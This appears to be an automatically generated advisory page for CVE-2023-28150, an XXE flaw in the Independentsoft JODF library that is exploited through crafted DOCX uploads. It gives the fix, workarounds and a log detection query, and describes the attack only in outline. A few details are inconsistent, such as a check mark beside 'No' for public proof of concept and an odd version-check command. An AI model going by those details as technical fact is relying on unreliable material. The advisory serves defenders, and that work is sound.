CVE-2023-28150 – This vulnerability allows attackers to perform ... (How to Fix)

Q: What is the severity of CVE-2023-28150?

CVE-2023-28150 has a CVSS score of 5.3 (MEDIUM). This vulnerability allows attackers to perform XML External Entity (XXE) injection attacks by uploading malicious DOCX files containing remote DTD references to systems using Independentsoft JODF. It affects applications that process DOCX files with vulnerable versions of the JODF library, potentially leading to data disclosure or server-side request forgery.

📋 TL;DR

This vulnerability allows attackers to perform XML External Entity (XXE) injection attacks by uploading malicious DOCX files containing remote DTD references to systems using Independentsoft JODF. It affects applications that process DOCX files with vulnerable versions of the JODF library, potentially leading to data disclosure or server-side request forgery.

💻 Affected Systems

Products:

Independentsoft JODF

Versions: All versions before 1.1.110

Operating Systems: All platforms running Java

Default Config Vulnerable: ⚠️ Yes

Notes: Any application using JODF library to parse DOCX files is vulnerable. The vulnerability is in the library itself, not dependent on specific application configurations.

📦 What is this software?

Jodf by Independentsoft

View all CVEs affecting Jodf →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise through file system access, sensitive data exfiltration, or internal network reconnaissance via server-side request forgery.

🟠

Likely Case

Unauthorized file read access on the server, disclosure of configuration files, or limited internal network scanning.

🟢

If Mitigated

Attack blocked at file upload stage with proper validation; no impact if XXE processing is disabled.

🌐 Internet-Facing: HIGH - Web applications accepting DOCX uploads are directly exposed to exploitation attempts.

🏢 Internal Only: MEDIUM - Internal applications processing DOCX files could be exploited by authenticated users or through other attack vectors.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XXE exploitation is well-documented and requires only a crafted DOCX file. No authentication needed if file upload functionality is exposed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1.110

Vendor Advisory: https://www.independentsoft.de/jword/index.html

Restart Required: No

Instructions:

1. Update JODF library to version 1.1.110 or later. 2. Replace the JODF JAR file in your application dependencies. 3. Rebuild and redeploy your application.

🔧 Temporary Workarounds

Disable XXE processing

all

Configure XML parser to disable external entity resolution

Set XML parser properties: FEATURE_SECURE_PROCESSING = true, DISALLOW_DOCTYPE_DECL = true

File type validation

all

Implement strict validation of uploaded DOCX files before processing

🧯 If You Can't Patch

Implement network segmentation to restrict outbound connections from affected servers
Deploy WAF rules to block malicious DOCX file uploads containing XXE payloads

🔍 How to Verify

Check if Vulnerable:

Check JODF library version in application dependencies. If version < 1.1.110, the system is vulnerable.

Check Version:

Check Maven/Gradle dependencies or examine JAR manifest: java -jar jodf.jar (if standalone) or check pom.xml/gradle.build files

Verify Fix Applied:

Verify JODF library version is 1.1.110 or higher in deployed application.

📡 Detection & Monitoring

Log Indicators:

Unusual file upload patterns
XML parsing errors with external entity references
Outbound connections to unusual domains during file processing

Network Indicators:

HTTP requests to external DTD URLs from server during DOCX processing
Unusual outbound traffic patterns following file uploads

SIEM Query:

source="application_logs" AND ("XXE" OR "DOCTYPE" OR "ENTITY") AND "DOCX"

📊 Metadata

CVE ID: CVE-2023-28150

CVSS v3 Score: 5.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE: CWE-611

Published: March 24, 2023

Last Updated: May 30, 2025

🔗 References

https://cds.thalesgroup.com/en/tcs-cert/CVE-2023-28150
https://excellium-services.com/cert-xlm-advisory/CVE-2023-28150 Third Party Advisory
https://www.independentsoft.de/jword/index.html Not Applicable
https://excellium-services.com/cert-xlm-advisory/CVE-2023-28150 Third Party Advisory
https://www.independentsoft.de/jword/index.html Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-28150, you might also want to check these: